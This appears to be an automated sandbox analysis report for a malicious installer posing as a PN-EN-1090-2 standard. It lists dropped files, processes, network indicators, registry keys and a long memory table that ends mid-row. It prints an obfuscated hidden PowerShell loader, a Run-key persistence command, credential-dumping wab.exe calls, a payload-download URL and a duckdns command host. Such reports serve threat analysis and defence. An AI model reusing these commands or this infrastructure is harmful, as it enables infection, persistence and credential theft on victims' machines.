Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
107. PN-EN-1090-2+A1_2012P.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\rumfangsformlers\mettemaries\Scrubbiest.Chy
|
ASCII text, with very long lines (59235), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\mqerms.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j1q00nf2.x1j.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_knbyuhcy.fab.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv8D01.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x9cdd386c, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ldxwtklqccjesqdwewwdgxwpfxxfslhug
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\rumfangsformlers\mettemaries\Curdy\Rendestenssprog\Tafler\forberedelseseksaminer.dal
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\rumfangsformlers\mettemaries\Dyreven17.Ult
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\rumfangsformlers\mettemaries\Introducerer32\Fagmnd\Epigoni\Sterlinglandene\bureaukratiseret.byl
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\rumfangsformlers\mettemaries\Ljtnant.txt
|
ASCII text, with very long lines (388), with CRLF line terminators
|
dropped
|
There are 3 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\107. PN-EN-1090-2+A1_2012P.exe
|
"C:\Users\user\Desktop\107. PN-EN-1090-2+A1_2012P.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$vgtige=Get-Content 'C:\Users\user\AppData\Local\Temp\rumfangsformlers\mettemaries\Scrubbiest.Chy';$noncongealing=$vgtige.SubString(9350,3);.$noncongealing($vgtige)"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Masturberedes" /t REG_EXPAND_SZ
/d "%Sekstettens% -windowstyle minimized $Trykstavelses=(Get-ItemProperty -Path 'HKCU:\vascularly\').Baculi;%Sekstettens%
($Trykstavelses)"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ldxwtklqccjesqdwewwdgxwpfxxfslhug"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oxkom"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yzpznvhl"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yzpznvhl"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Masturberedes" /t REG_EXPAND_SZ /d "%Sekstettens% -windowstyle
minimized $Trykstavelses=(Get-ItemProperty -Path 'HKCU:\vascularly\').Baculi;%Sekstettens% ($Trykstavelses)"
|
There are 2 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
|
|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://ricohltd.top/aCqwFQDQz144.bin
|
172.67.191.112
|
||
|
http://nsis.sf.net/NSIS_Error
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://crl.microsofteU
|
unknown
|
||
|
http://www.microsoft.coR
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 12 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
learfo55ozj01.duckdns.org
|
193.222.96.21
|
|
|
|
geoplugin.net
|
178.237.33.50
|
||
|
ricohltd.top
|
172.67.191.112
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
193.222.96.21
|
learfo55ozj01.duckdns.org
|
Germany
|
|
|
|
172.67.191.112
|
ricohltd.top
|
United States
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\vascularly
|
Baculi
|
||
|
HKEY_CURRENT_USER\Environment
|
Sekstettens
|
||
|
HKEY_CURRENT_USER\SOFTWARE\alpwovnb-G3F5OR
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\alpwovnb-G3F5OR
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\alpwovnb-G3F5OR
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Masturberedes
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
B220000
|
direct allocation
|
page execute and read and write
|
|
|
|
2B65000
|
heap
|
page read and write
|
||
|
3BF0000
|
remote allocation
|
page execute and read and write
|
||
|
85C0000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
31AA000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
4FF0000
|
remote allocation
|
page execute and read and write
|
||
|
23D6C000
|
stack
|
page read and write
|
||
|
2FEF000
|
heap
|
page read and write
|
||
|
A00000
|
heap
|
page read and write
|
||
|
2B65000
|
heap
|
page read and write
|
||
|
880D000
|
heap
|
page read and write
|
||
|
24590000
|
direct allocation
|
page read and write
|
||
|
32E0000
|
heap
|
page read and write
|
||
|
303A000
|
stack
|
page read and write
|
||
|
300E000
|
heap
|
page read and write
|
||
|
4EAC000
|
stack
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
2B10000
|
heap
|
page readonly
|
||
|
8A0000
|
heap
|
page read and write
|
||
|
2FFD000
|
heap
|
page read and write
|
||
|
3023000
|
heap
|
page read and write
|
||
|
2B65000
|
heap
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
3031000
|
heap
|
page read and write
|
||
|
4B0000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
880D000
|
heap
|
page read and write
|
||
|
2F60000
|
heap
|
page read and write
|
||
|
A59000
|
heap
|
page read and write
|
||
|
3003000
|
heap
|
page read and write
|
||
|
2E78000
|
stack
|
page read and write
|
||
|
5221000
|
heap
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
2FF1000
|
heap
|
page read and write
|
||
|
7AE0000
|
trusted library allocation
|
page read and write
|
||
|
4DDF000
|
stack
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
3004000
|
heap
|
page read and write
|
||
|
9420000
|
direct allocation
|
page execute and read and write
|
||
|
7AB0000
|
trusted library allocation
|
page read and write
|
||
|
32F9000
|
heap
|
page read and write
|
||
|
51A000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
61BB000
|
trusted library allocation
|
page read and write
|
||
|
C9D000
|
stack
|
page read and write
|
||
|
443000
|
unkown
|
page readonly
|
||
|
3007000
|
heap
|
page read and write
|
||
|
500000
|
heap
|
page read and write
|
||
|
7900000
|
trusted library allocation
|
page read and write
|
||
|
2FF1000
|
heap
|
page read and write
|
||
|
7160000
|
direct allocation
|
page read and write
|
||
|
520000
|
heap
|
page read and write
|
||
|
30C0000
|
heap
|
page read and write
|
||
|
50CB000
|
heap
|
page read and write
|
||
|
2F1E000
|
stack
|
page read and write
|
||
|
3005000
|
heap
|
page read and write
|
||
|
51C000
|
heap
|
page read and write
|
||
|
2FFE000
|
heap
|
page read and write
|
||
|
62E7000
|
trusted library allocation
|
page read and write
|
||
|
249B9000
|
heap
|
page read and write
|
||
|
7680000
|
heap
|
page execute and read and write
|
||
|
23FF0000
|
direct allocation
|
page read and write
|
||
|
3183000
|
trusted library allocation
|
page execute and read and write
|
||
|
311B000
|
heap
|
page read and write
|
||
|
54CD000
|
heap
|
page read and write
|
||
|
290F000
|
stack
|
page read and write
|
||
|
8610000
|
trusted library allocation
|
page read and write
|
||
|
8910000
|
heap
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
77FF000
|
heap
|
page read and write
|
||
|
4CD5000
|
heap
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
8710000
|
heap
|
page read and write
|
||
|
3530000
|
heap
|
page read and write
|
||
|
23F4F000
|
stack
|
page read and write
|
||
|
311C000
|
heap
|
page read and write
|
||
|
2FE8000
|
heap
|
page read and write
|
||
|
52A6000
|
heap
|
page read and write
|
||
|
2EAE000
|
stack
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
529F000
|
heap
|
page read and write
|
||
|
546000
|
heap
|
page read and write
|
||
|
2FE1000
|
heap
|
page read and write
|
||
|
88AD000
|
stack
|
page read and write
|
||
|
2432F000
|
stack
|
page read and write
|
||
|
3110000
|
heap
|
page read and write
|
||
|
44B000
|
heap
|
page read and write
|
||
|
3090000
|
direct allocation
|
page read and write
|
||
|
85E0000
|
heap
|
page read and write
|
||
|
3080000
|
heap
|
page read and write
|
||
|
2B65000
|
heap
|
page read and write
|
||
|
249E9000
|
heap
|
page read and write
|
||
|
2FAF000
|
stack
|
page read and write
|
||
|
2FE9000
|
heap
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
86F000
|
stack
|
page read and write
|
||
|
31B2000
|
trusted library allocation
|
page read and write
|
||
|
8720000
|
heap
|
page readonly
|
||
|
23CAD000
|
stack
|
page read and write
|
||
|
4F00000
|
trusted library allocation
|
page read and write
|
||
|
7A30000
|
trusted library allocation
|
page execute and read and write
|
||
|
249C9000
|
heap
|
page read and write
|
||
|
81F0000
|
remote allocation
|
page execute and read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
2FFB000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
50B0000
|
trusted library allocation
|
page read and write
|
||
|
249C9000
|
heap
|
page read and write
|
||
|
2FF1000
|
heap
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
4EF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
50B0000
|
trusted library allocation
|
page read and write
|
||
|
24941000
|
heap
|
page read and write
|
||
|
2F40000
|
heap
|
page readonly
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
BC20000
|
direct allocation
|
page execute and read and write
|
||
|
8500000
|
trusted library allocation
|
page read and write
|
||
|
4FFE000
|
stack
|
page read and write
|
||
|
24000000
|
direct allocation
|
page read and write
|
||
|
77F0000
|
remote allocation
|
page execute and read and write
|
||
|
5290000
|
heap
|
page read and write
|
||
|
24631000
|
heap
|
page read and write
|
||
|
85F0000
|
trusted library allocation
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
61E000
|
stack
|
page read and write
|
||
|
5BE000
|
stack
|
page read and write
|
||
|
3001000
|
heap
|
page read and write
|
||
|
3003000
|
heap
|
page read and write
|
||
|
84F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
2BD0000
|
heap
|
page read and write
|
||
|
3090000
|
heap
|
page readonly
|
||
|
8AF0000
|
trusted library allocation
|
page read and write
|
||
|
2FE1000
|
heap
|
page read and write
|
||
|
2E3C000
|
stack
|
page read and write
|
||
|
3020000
|
direct allocation
|
page read and write
|
||
|
3290000
|
heap
|
page read and write
|
||
|
2406E000
|
stack
|
page read and write
|
||
|
2FE1000
|
heap
|
page read and write
|
||
|
2C40000
|
heap
|
page read and write
|
||
|
85BF000
|
stack
|
page read and write
|
||
|
886E000
|
stack
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
2F20000
|
heap
|
page read and write
|
||
|
300A000
|
heap
|
page read and write
|
||
|
2FE1000
|
heap
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
500F000
|
stack
|
page read and write
|
||
|
87BD000
|
heap
|
page read and write
|
||
|
2FF7000
|
heap
|
page read and write
|
||
|
2FE1000
|
heap
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
3170000
|
trusted library allocation
|
page read and write
|
||
|
87C5000
|
heap
|
page read and write
|
||
|
684000
|
heap
|
page read and write
|
||
|
2FE9000
|
heap
|
page read and write
|
||
|
2A94000
|
stack
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
77D6000
|
heap
|
page read and write
|
||
|
3030000
|
direct allocation
|
page read and write
|
||
|
C620000
|
direct allocation
|
page execute and read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
3140000
|
heap
|
page read and write
|
||
|
3137000
|
heap
|
page read and write
|
||
|
31C8000
|
heap
|
page read and write
|
||
|
3118000
|
heap
|
page read and write
|
||
|
52D000
|
heap
|
page read and write
|
||
|
23C0000
|
heap
|
page read and write
|
||
|
241CE000
|
stack
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
23810000
|
direct allocation
|
page read and write
|
||
|
4FBF000
|
stack
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
9FD000
|
stack
|
page read and write
|
||
|
8737000
|
heap
|
page read and write
|
||
|
8910000
|
direct allocation
|
page read and write
|
||
|
3311000
|
heap
|
page read and write
|
||
|
2F2E000
|
unkown
|
page read and write
|
||
|
4CD0000
|
heap
|
page read and write
|
||
|
3005000
|
heap
|
page read and write
|
||
|
24A4B000
|
heap
|
page read and write
|
||
|
3026000
|
heap
|
page read and write
|
||
|
2FE1000
|
heap
|
page read and write
|
||
|
8920000
|
direct allocation
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
31B5000
|
trusted library allocation
|
page execute and read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
882C000
|
stack
|
page read and write
|
||
|
62FA000
|
trusted library allocation
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
6179000
|
trusted library allocation
|
page read and write
|
||
|
8680000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
249E9000
|
heap
|
page read and write
|
||
|
24741000
|
heap
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
4E58000
|
trusted library allocation
|
page read and write
|
||
|
3140000
|
heap
|
page read and write
|
||
|
3005000
|
heap
|
page read and write
|
||
|
763E000
|
stack
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
533000
|
heap
|
page read and write
|
||
|
3148000
|
heap
|
page read and write
|
||
|
23F0E000
|
stack
|
page read and write
|
||
|
3035000
|
heap
|
page read and write
|
||
|
3050000
|
heap
|
page read and write
|
||
|
8950000
|
heap
|
page read and write
|
||
|
680000
|
heap
|
page read and write
|
||
|
8967000
|
heap
|
page read and write
|
||
|
4ECF000
|
stack
|
page read and write
|
||
|
2B60000
|
heap
|
page read and write
|
||
|
76B2000
|
heap
|
page read and write
|
||
|
30B0000
|
direct allocation
|
page read and write
|
||
|
2FEC000
|
heap
|
page read and write
|
||
|
2FF1000
|
heap
|
page read and write
|
||
|
32EF000
|
heap
|
page read and write
|
||
|
43F000
|
unkown
|
page readonly
|
||
|
59F0000
|
remote allocation
|
page execute and read and write
|
||
|
5140000
|
heap
|
page execute and read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
400000
|
heap
|
page read and write
|
||
|
23840000
|
direct allocation
|
page read and write
|
||
|
2B65000
|
heap
|
page read and write
|
||
|
24010000
|
direct allocation
|
page read and write
|
||
|
8765000
|
trusted library allocation
|
page read and write
|
||
|
5167000
|
heap
|
page read and write
|
||
|
301E000
|
heap
|
page read and write
|
||
|
3293000
|
heap
|
page read and write
|
||
|
78F0000
|
trusted library allocation
|
page read and write
|
||
|
4F0E000
|
stack
|
page read and write
|
||
|
4E0000
|
heap
|
page read and write
|
||
|
315F000
|
unkown
|
page read and write
|
||
|
2C70000
|
heap
|
page read and write
|
||
|
300C000
|
heap
|
page read and write
|
||
|
22FF000
|
stack
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
511000
|
heap
|
page read and write
|
||
|
50B0000
|
trusted library allocation
|
page read and write
|
||
|
886C000
|
stack
|
page read and write
|
||
|
3001000
|
heap
|
page read and write
|
||
|
43D000
|
unkown
|
page read and write
|
||
|
2446D000
|
stack
|
page read and write
|
||
|
430000
|
unkown
|
page read and write
|
||
|
53B6000
|
heap
|
page read and write
|
||
|
88F0000
|
heap
|
page read and write
|
||
|
2BC0000
|
heap
|
page read and write
|
||
|
435000
|
unkown
|
page read and write
|
||
|
5220000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
243AE000
|
stack
|
page read and write
|
||
|
A820000
|
direct allocation
|
page execute and read and write
|
||
|
7AA0000
|
trusted library allocation
|
page read and write
|
||
|
2FF0000
|
direct allocation
|
page read and write
|
||
|
321E000
|
stack
|
page read and write
|
||
|
78C0000
|
trusted library allocation
|
page read and write
|
||
|
6151000
|
trusted library allocation
|
page read and write
|
||
|
8957000
|
heap
|
page read and write
|
||
|
25FD000
|
stack
|
page read and write
|
||
|
5151000
|
trusted library allocation
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
3003000
|
heap
|
page read and write
|
||
|
2436B000
|
stack
|
page read and write
|
||
|
301B000
|
heap
|
page read and write
|
||
|
3300000
|
heap
|
page read and write
|
||
|
329C000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
2FE9000
|
heap
|
page read and write
|
||
|
300C000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
2EE0000
|
heap
|
page read and write
|
||
|
3001000
|
heap
|
page read and write
|
||
|
63F0000
|
remote allocation
|
page execute and read and write
|
||
|
A807000
|
trusted library allocation
|
page read and write
|
||
|
695000
|
heap
|
page read and write
|
||
|
3014000
|
heap
|
page read and write
|
||
|
301E000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
D020000
|
direct allocation
|
page execute and read and write
|
||
|
24D9D000
|
unclassified section
|
page execute and read and write
|
||
|
300E000
|
heap
|
page read and write
|
||
|
301A000
|
heap
|
page read and write
|
||
|
2A92000
|
stack
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
300E000
|
heap
|
page read and write
|
||
|
9D000
|
stack
|
page read and write
|
||
|
86F0000
|
heap
|
page read and write
|
||
|
D3E000
|
stack
|
page read and write
|
||
|
301F000
|
heap
|
page read and write
|
||
|
2390000
|
heap
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
31D0000
|
trusted library allocation
|
page read and write
|
||
|
235E000
|
stack
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
42C000
|
unkown
|
page read and write
|
||
|
7B4C000
|
stack
|
page read and write
|
||
|
2452E000
|
stack
|
page read and write
|
||
|
87F9000
|
heap
|
page read and write
|
||
|
2FEC000
|
heap
|
page read and write
|
||
|
4DE8000
|
heap
|
page read and write
|
||
|
899B000
|
heap
|
page read and write
|
||
|
789D000
|
heap
|
page read and write
|
||
|
3160000
|
trusted library section
|
page read and write
|
||
|
5135000
|
heap
|
page execute and read and write
|
||
|
7150000
|
direct allocation
|
page read and write
|
||
|
300A000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
3001000
|
heap
|
page read and write
|
||
|
3A60000
|
remote allocation
|
page execute and read and write
|
||
|
4FE000
|
heap
|
page read and write
|
||
|
77D9000
|
heap
|
page read and write
|
||
|
3184000
|
trusted library allocation
|
page read and write
|
||
|
8600000
|
trusted library allocation
|
page read and write
|
||
|
242AC000
|
stack
|
page read and write
|
||
|
77C1000
|
heap
|
page read and write
|
||
|
6300000
|
trusted library allocation
|
page read and write
|
||
|
3110000
|
heap
|
page read and write
|
||
|
301E000
|
heap
|
page read and write
|
||
|
32A8000
|
heap
|
page read and write
|
||
|
24740000
|
heap
|
page read and write
|
||
|
2F6B000
|
heap
|
page read and write
|
||
|
45F0000
|
remote allocation
|
page execute and read and write
|
||
|
23890000
|
direct allocation
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
318D000
|
trusted library allocation
|
page execute and read and write
|
||
|
77DD000
|
heap
|
page read and write
|
||
|
2FEC000
|
heap
|
page read and write
|
||
|
2C78000
|
heap
|
page read and write
|
||
|
3119000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
3010000
|
direct allocation
|
page read and write
|
||
|
30F0000
|
heap
|
page read and write
|
||
|
D80000
|
heap
|
page read and write
|
||
|
23C40000
|
heap
|
page read and write
|
||
|
249E1000
|
heap
|
page read and write
|
||
|
7677000
|
trusted library allocation
|
page read and write
|
||
|
43A0000
|
trusted library allocation
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
3120000
|
trusted library section
|
page read and write
|
||
|
240FE000
|
stack
|
page read and write
|
||
|
319E000
|
stack
|
page read and write
|
||
|
340F000
|
stack
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
A50000
|
heap
|
page read and write
|
||
|
302E000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
2457B000
|
unclassified section
|
page execute and read and write
|
||
|
24E1C000
|
unclassified section
|
page execute and read and write
|
||
|
31C0000
|
heap
|
page read and write
|
||
|
238B0000
|
direct allocation
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
3180000
|
trusted library allocation
|
page read and write
|
||
|
23820000
|
direct allocation
|
page read and write
|
||
|
250D000
|
stack
|
page read and write
|
||
|
2FF5000
|
heap
|
page read and write
|
||
|
2E7C000
|
stack
|
page read and write
|
||
|
315F000
|
heap
|
page read and write
|
||
|
2EBB000
|
stack
|
page read and write
|
||
|
7EF40000
|
trusted library allocation
|
page execute and read and write
|
||
|
24D40000
|
unclassified section
|
page execute and read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
24A1B000
|
heap
|
page read and write
|
||
|
2413E000
|
stack
|
page read and write
|
||
|
507E000
|
stack
|
page read and write
|
||
|
2E6E000
|
stack
|
page read and write
|
||
|
238C0000
|
direct allocation
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
2FF5000
|
heap
|
page read and write
|
||
|
3001000
|
heap
|
page read and write
|
||
|
7A50000
|
trusted library allocation
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
2420F000
|
stack
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
3060000
|
heap
|
page read and write
|
||
|
7842000
|
heap
|
page read and write
|
||
|
3000000
|
direct allocation
|
page read and write
|
||
|
23860000
|
direct allocation
|
page read and write
|
||
|
2FFE000
|
heap
|
page read and write
|
||
|
880E000
|
heap
|
page read and write
|
||
|
24560000
|
unclassified section
|
page execute and read and write
|
||
|
24940000
|
heap
|
page read and write
|
||
|
3130000
|
heap
|
page read and write
|
||
|
7910000
|
trusted library allocation
|
page read and write
|
||
|
24190000
|
remote allocation
|
page read and write
|
||
|
2B65000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
249B9000
|
heap
|
page read and write
|
||
|
24721000
|
heap
|
page read and write
|
||
|
23870000
|
direct allocation
|
page read and write
|
||
|
2F92000
|
heap
|
page read and write
|
||
|
8997000
|
heap
|
page read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
31A0000
|
trusted library allocation
|
page read and write
|
||
|
311E000
|
heap
|
page read and write
|
||
|
516F000
|
heap
|
page read and write
|
||
|
23CED000
|
stack
|
page read and write
|
||
|
24DC0000
|
unclassified section
|
page execute and read and write
|
||
|
2FF1000
|
heap
|
page read and write
|
||
|
3042000
|
heap
|
page read and write
|
||
|
249E1000
|
heap
|
page read and write
|
||
|
78E0000
|
trusted library allocation
|
page read and write
|
||
|
3023000
|
heap
|
page read and write
|
||
|
344E000
|
stack
|
page read and write
|
||
|
3040000
|
direct allocation
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
3302000
|
heap
|
page read and write
|
||
|
50BE000
|
stack
|
page read and write
|
||
|
504E000
|
stack
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
8759000
|
heap
|
page read and write
|
||
|
25B0000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
2A8F000
|
stack
|
page read and write
|
||
|
2FFE000
|
heap
|
page read and write
|
||
|
DA20000
|
direct allocation
|
page execute and read and write
|
||
|
85D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
302B000
|
heap
|
page read and write
|
||
|
87B6000
|
heap
|
page read and write
|
||
|
50B0000
|
heap
|
page read and write
|
||
|
3001000
|
heap
|
page read and write
|
||
|
244AF000
|
stack
|
page read and write
|
||
|
2B00000
|
heap
|
page read and write
|
||
|
2B65000
|
heap
|
page read and write
|
||
|
8B30000
|
trusted library allocation
|
page read and write
|
||
|
2FFE000
|
heap
|
page read and write
|
||
|
23830000
|
direct allocation
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
3270000
|
heap
|
page read and write
|
||
|
254E000
|
stack
|
page read and write
|
||
|
24941000
|
heap
|
page read and write
|
||
|
8795000
|
heap
|
page read and write
|
||
|
23D2D000
|
stack
|
page read and write
|
||
|
2F78000
|
heap
|
page read and write
|
||
|
443000
|
unkown
|
page readonly
|
||
|
300A000
|
heap
|
page read and write
|
||
|
4EEE000
|
stack
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
CF0000
|
heap
|
page read and write
|
||
|
7AD0000
|
trusted library allocation
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
690000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
54C3000
|
heap
|
page read and write
|
||
|
3004000
|
heap
|
page read and write
|
||
|
C5D000
|
stack
|
page read and write
|
||
|
2EF0000
|
heap
|
page read and write
|
||
|
249E9000
|
heap
|
page read and write
|
||
|
2FF6000
|
heap
|
page read and write
|
||
|
410000
|
heap
|
page read and write
|
||
|
2FE1000
|
heap
|
page read and write
|
||
|
311A000
|
heap
|
page read and write
|
||
|
301B000
|
heap
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
4CBE000
|
stack
|
page read and write
|
||
|
2FEE000
|
heap
|
page read and write
|
||
|
89F000
|
stack
|
page read and write
|
||
|
4C02000
|
heap
|
page read and write
|
||
|
3003000
|
heap
|
page read and write
|
||
|
5130000
|
heap
|
page execute and read and write
|
||
|
2FFE000
